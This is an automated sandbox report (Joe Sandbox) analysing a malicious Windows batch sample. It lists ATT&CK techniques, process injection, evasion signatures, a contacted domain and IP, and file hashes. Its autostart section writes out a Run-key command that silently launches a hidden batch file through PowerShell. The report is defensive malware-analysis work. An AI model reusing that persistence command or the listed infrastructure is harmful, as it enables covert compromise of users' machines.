Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
Valid Accounts12
Windows Management Instrumentation
1
Scripting
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
1
Credential API Hooking
1
System Time Discovery
Remote Services1
Archive Collected Data
2
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts12
Native API
1
DLL Side-Loading
1
Access Token Manipulation
1
Obfuscated Files or Information
11
Input Capture
3
File and Directory Discovery
Remote Desktop Protocol1
Credential API Hooking
1
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts22
Command and Scripting Interpreter
11
Scheduled Task/Job
813
Process Injection
1
Software Packing
Security Account Manager132
System Information Discovery
SMB/Windows Admin Shares11
Input Capture
1
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts11
Scheduled Task/Job
31
Registry Run Keys / Startup Folder
11
Scheduled Task/Job
1
DLL Side-Loading
NTDS471
Security Software Discovery
Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts1
PowerShell
Network Logon Script31
Registry Run Keys / Startup Folder
1
File Deletion
LSA Secrets2
Process Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts4
Rootkit
Cached Domain Credentials251
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
Masquerading
DCSync1
Application Window Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Modify Registry
Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt251
Virtualization/Sandbox Evasion
/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Access Token Manipulation
Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd813
Process Injection
Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task2
Hidden Files and Directories
KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1525473 Sample: 1.cmd Startdate: 04/10/2024 Architecture: WINDOWS Score: 100 84 azure-winsecure.com 2->84 96 Malicious sample detected (through community Yara rule) 2->96 98 Multi AV Scanner detection for submitted file 2->98 100 .NET source code references suspicious native API functions 2->100 102 14 other signatures 2->102 13 cmd.exe 1 2->13         started        16 powershell.exe 2->16         started        signatures3 process4 signatures5 132 Suspicious powershell command line found 13->132 134 Suspicious command line found 13->134 18 powershell.exe 37 13->18         started        22 WMIC.exe 1 13->22         started        24 WMIC.exe 1 13->24         started        30 4 other processes 13->30 136 Writes to foreign memory regions 16->136 138 Modifies the context of a thread in another process (thread injection) 16->138 140 Found suspicious powershell code related to unpacking or dynamic code loading 16->140 142 Injects a PE file into a foreign processes 16->142 26 dllhost.exe 16->26         started        28 conhost.exe 16->28         started        process6 file7 80 C:\Windows\$rbx-onimai2\$rbx-CO2.bat, DOS 18->80 dropped 104 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 18->104 106 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 18->106 108 Uses schtasks.exe or at.exe to add and modify task schedules 18->108 116 4 other signatures 18->116 32 cmd.exe 1 18->32         started        35 WerFault.exe 20 16 18->35         started        110 Injects code into the Windows Explorer (explorer.exe) 26->110 112 Contains functionality to inject code into remote processes 26->112 114 Writes to foreign memory regions 26->114 118 3 other signatures 26->118 37 lsass.exe 26->37 injected 39 winlogon.exe 26->39 injected 41 svchost.exe 26->41 injected 43 19 other processes 26->43 signatures8 process9 signatures10 88 Suspicious powershell command line found 32->88 45 powershell.exe 32->45         started        47 conhost.exe 32->47         started        49 cmd.exe 1 32->49         started        90 Writes to foreign memory regions 37->90 process11 process12 51 cmd.exe 1 45->51         started        signatures13 120 Suspicious powershell command line found 51->120 122 Suspicious command line found 51->122 54 powershell.exe 51->54         started        59 WMIC.exe 1 51->59         started        61 WMIC.exe 1 51->61         started        63 4 other processes 51->63 process14 dnsIp15 86 azure-winsecure.com 192.64.119.55, 49835, 49993, 50016 NAMECHEAP-NETUS United States 54->86 82 C:\Users\user\AppData\Roaming\...\2024-10-04, DOS 54->82 dropped 124 Creates autostart registry keys with suspicious values (likely registry only malware) 54->124 126 Creates autostart registry keys with suspicious names 54->126 128 Creates an autostart registry key pointing to binary in C:\Windows 54->128 130 6 other signatures 54->130 65 powershell.exe 54->65         started        68 schtasks.exe 54->68         started        70 WerFault.exe 54->70         started        72 WerFault.exe 54->72         started        file16 signatures17 process18 signatures19 92 Found suspicious powershell code related to unpacking or dynamic code loading 65->92 94 Injects a PE file into a foreign processes 65->94 74 conhost.exe 65->74         started        76 powershell.exe 65->76         started        78 conhost.exe 68->78         started        process20

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
1.cmd4%ReversingLabs
1.cmd15%VirustotalBrowse
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://upx.sf.net0%URL Reputationsafe
https://aka.ms/pscore60%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
http://schemas.micro0%URL Reputationsafe
http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
azure-winsecure.com
192.64.119.55
truefalse
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://nuget.org/NuGet.exepowershell.exe, 00000007.00000002.2316955445.000001FDC5ABD000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2BC1000.00000004.00000800.00020000.00000000.sdmpfalse
    • URL Reputation: safe
    unknown
    http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
      unknown
      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      unknown
      http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
        unknown
        http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
          unknown
          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmpfalse
            unknown
            https://go.micropowershell.exe, 00000024.00000002.2457748410.000001C2C3B35000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://contoso.com/Licensepowershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://contoso.com/Iconpowershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            http://upx.sf.netAmcache.hve.10.drfalse
            • URL Reputation: safe
            unknown
            http://www.microsoft.co9=powershell.exe, 0000001A.00000002.3037904696.000002123B5A0000.00000004.00000001.00020000.00000000.sdmpfalse
              unknown
              https://wns2-by3p.notify.windows.com/?token=AwYAAACklixT6U5TxXWj7Y4oTt3JqNuZjYaQtFRvg3Ifna8Pnwup50yqMicrosoft-Windows-PushNotification-Platform%4Operational.evtx.50.drfalse
                unknown
                https://aka.ms/pscore6powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, Null.26.dr, Null.7.drfalse
                • URL Reputation: safe
                unknown
                http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                http://schemas.microsvchost.exe, 00000033.00000000.2527662672.00000241A96E0000.00000002.00000001.00040000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://github.com/Pester/Pesterpowershell.exe, 00000024.00000002.2457748410.000001C2C2BDD000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000032.00000000.2536368121.000001D5596D8000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000032.00000002.3076105441.000001D5596D8000.00000004.00000001.00020000.00000000.sdmpfalse
                  unknown
                  http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454743995.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3007290735.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpfalse
                    unknown
                    http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                      unknown
                      http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contoso.com/powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000007.00000002.2316955445.000001FDC5ABD000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2652633968.000001C2D2A1C000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://Passport.NET/tbMicrosoft-Windows-LiveId%4Operational.evtx.50.drfalse
                        unknown
                        https://aka.ms/pscore68powershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2457748410.000001C2C29B1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000028.00000000.2454743995.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000002.3007290735.00000202BFC4E000.00000004.00000001.00020000.00000000.sdmpfalse
                          unknown
                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000028.00000002.3005879119.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000028.00000000.2454680799.00000202BFC2F000.00000004.00000001.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          https://aka.ms/pscore6xGxpowershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmpfalse
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000007.00000002.2075248949.000001FDB5A31000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 0000001A.00000002.3070067060.000002123D501000.00000004.00000001.00020000.00000000.sdmp, powershell.exe, 00000024.00000002.2457748410.000001C2C29B1000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            192.64.119.55
                            azure-winsecure.comUnited States
                            22612NAMECHEAP-NETUSfalse
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1525473
                            Start date and time:2024-10-04 09:41:04 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 11m 29s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:42
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:19
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:1.cmd
                            Detection:MAL
                            Classification:mal100.spyw.evad.winCMD@55/94@1/1
                            EGA Information:
                            • Successful, ratio: 93.3%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 70
                            • Number of non-executed functions: 306
                            Cookbook Comments:
                            • Found application associated with file extension: .cmd
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 20.189.173.20, 20.189.173.21, 20.42.65.92, 52.182.143.212
                            • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, onedsblobprdwus16.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                            • Execution Graph export aborted for target powershell.exe, PID 2852 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size exceeded maximum capacity and may have missing disassembly code.
                            • Report size getting too big, too many NtFsControlFile calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            TimeTypeDescription
                            03:42:00API Interceptor4x Sleep call for process: WMIC.exe modified
                            03:42:03API Interceptor22278x Sleep call for process: powershell.exe modified
                            03:42:22API Interceptor2x Sleep call for process: WerFault.exe modified
                            03:43:46API Interceptor250x Sleep call for process: winlogon.exe modified
                            03:43:47API Interceptor222x Sleep call for process: lsass.exe modified
                            03:43:47API Interceptor1553x Sleep call for process: svchost.exe modified
                            03:43:49API Interceptor198x Sleep call for process: dwm.exe modified
                            03:44:00API Interceptor20x Sleep call for process: cmd.exe modified
                            03:44:00API Interceptor17x Sleep call for process: WMIADAP.exe modified
                            03:44:00API Interceptor20x Sleep call for process: conhost.exe modified
                            08:43:29AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                            08:43:37AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run $rbx-XVR cmd.exe /c echo Start-Process -FilePath 'C:\Windows\$rbx-onimai2\$rbx-CO2.bat' -WindowStyle Hidden | powershell.exe -WindowStyle Hidden
                            No context
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            azure-winsecure.com1 (2).cmdGet hashmaliciousUnknownBrowse
                            • 154.216.20.132
                            rbx-CO2.batGet hashmaliciousUnknownBrowse
                            • 154.216.20.132
                            SC.cmdGet hashmaliciousUnknownBrowse
                            • 154.216.20.132
                            1.cmdGet hashmaliciousUnknownBrowse
                            • 154.216.20.132
                            2.cmdGet hashmaliciousUnknownBrowse
                            • 154.216.20.132
                            download_2.exeGet hashmaliciousQuasarBrowse
                            • 154.216.20.132
                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            NAMECHEAP-NETUS-pdf.bat.exeGet hashmaliciousFormBookBrowse
                            • 162.213.249.216
                            https://livelovelead.coach/wp-admin/readme.htmlGet hashmaliciousPhisherBrowse
                            • 162.0.235.3
                            hH4dbIGfGT.exeGet hashmaliciousFormBookBrowse
                            • 162.0.236.169
                            DHL_ 46773482.exeGet hashmaliciousFormBookBrowse
                            • 162.0.238.246
                            Fvqw64NU4k.exeGet hashmaliciousFormBookBrowse
                            • 162.0.236.169
                            PO-A1702108.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                            • 198.54.122.135
                            PURCHASE ORDER.exeGet hashmaliciousFormBookBrowse
                            • 199.192.21.169
                            SHIPPING_DOCUMENTS.VBS.vbsGet hashmaliciousFormBookBrowse
                            • 162.213.249.216
                            No context
                            No context
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.508739593746198
                            Encrypted:false
                            SSDEEP:192:7w2ylmGvy9d0eLDkjaVTyJN5Wl4lg6zuiFGZ24lO8n:TygGvykeLDkj+T+5gqg6zuiFGY4lO8n
                            MD5:37B792005EDF19E81B1ABF66F4816740
                            SHA1:25CE8BA8EC3598029550DF1167F687BA149224E9
                            SHA-256:49E129B1A9E5646E7F885D389A8DE9904AEB4E52AF89A5E08C72CB88D346737A
                            SHA-512:7B2F533BA9D60EE4ADB1B6E81F0C0825BEE43257CE2B344651D24929D7BE3D6C9874D52065B8595C9A0FBDCEB941D6B41A0B2EFCF63E4D052415AB82FFAE2B7B
                            Malicious:false
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.5.0.1.3.2.8.8.0.8.4.7.5.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.5.0.1.3.3.0.0.4.2.8.4.4.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.f.8.0.d.8.d.a.-.3.1.d.f.-.4.b.2.c.-.b.c.f.b.-.3.1.8.3.0.9.2.5.e.2.b.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.a.c.a.5.e.8.-.4.3.c.0.-.4.a.7.3.-.a.d.a.4.-.e.6.c.d.0.8.5.7.d.2.9.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.5.0.4.-.0.0.0.1.-.0.0.1.4.-.a.0.9.8.-.d.5.e.6.3.0.1.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):65536
                            Entropy (8bit):1.5087593177022136
                            Encrypted:false
                            SSDEEP:192:VkbkmGpy9d0eLDkja1TyGcDulAlg6zuiFGZ24lO8n:mjGpykeLDkjOTQD4Cg6zuiFGY4lO8n
                            MD5:FAC113DBE19E9E416829F0587F94C759
                            SHA1:31F9BCF76E16F2E3B6BF8BDE349FC80747F8C834
                            SHA-256:D8A5F4773BAD869F44A72EEC61DD3366B0EF6FE88220DD8F09840002DD1BAF6C
                            SHA-512:7105DB3A8A2FAB3103B45DC940E8AD42B7E056DC59057AC7701E011DF7FC33183A6C9234F77F2A3DB86E3A6E90989A83684AC91AF86DCD547966DE1F956B93E6
                            Malicious:false
                            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.5.0.1.3.8.3.3.4.2.8.6.4.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.5.0.1.3.8.4.5.1.4.7.3.7.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.a.7.5.0.e.7.d.-.2.e.6.2.-.4.7.0.3.-.8.6.c.1.-.e.8.7.7.1.a.d.7.f.a.d.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.9.d.9.e.1.f.-.8.5.6.9.-.4.a.e.6.-.9.3.d.f.-.a.5.7.0.6.f.b.9.0.2.1.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.p.o.w.e.r.s.h.e.l.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.2.d.c.-.0.0.0.1.-.0.0.1.4.-.d.f.1.4.-.6.1.0.7.3.1.1.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:Mini DuMP crash report, 15 streams, Fri Oct 4 07:43:03 2024, 0x1205a4 type
                            Category:dropped
                            Size (bytes):910700
                            Entropy (8bit):3.5216072049855582
                            Encrypted:false
                            SSDEEP:12288:ZcS70pwchF98ojZaontt1gObqO/Q+5Ax:iS70Ki8iZaot/7q4QU
                            MD5:0186EDC09DE9EC5B51F90584832B1AFD
                            SHA1:0826BD65936D35E8DC1FB60C15B9F1424D2FF096
                            SHA-256:9D41FB17AF3AB8C3638D7F3984A7E00D7AA1BCB026D532059AB1B973DF394967
                            SHA-512:FAA26588EC77E295124925D36AEC108CEA3A436C9D2665D0776F6F7C8E2D9154CB851ADEE13AFFF6CBACF365458ED15D4369951A70A28B6270A9DDE0A41D3E44
                            Malicious:false
                            Preview:MDMP..a..... ..........f............$............'..8........;...2......................`.......8...........T............_..\............m...........o..............................................................................eJ......|p......Lw......................T..............f.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                            Process:C:\Windows\System32\WerFault.exe
                            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):8782
                            Entropy (8bit):3.6959762702757173
                            Encrypted:false
                            SSDEEP:192:R6l7wVeJWMfY6YeRY6gmfZaP4pWEE89bfS8sfMVm:R6lXJVw6YYFgmfQPwfofz
                            MD5:429C3655DB86FC5D632BCA554BD68B74
                            SHA1:3DCB1437F73F7EB3758D2A5671A3C0A89EA23769
                            SHA-256:87A0C3E6C8C1708DED1F242FCF73E74ACD6A8FE515738B2EAC82DCA6F2E89986
                            SHA-512:35DAC13B861884E674C4564F014E3392248A9511E3FD3CE380AEE2FF5B5BCB2AE1BC15037616B048FDDCC14B784AA22D3B64D2DFDFD50772545E99E762BEF6DD
                            Malicious:false
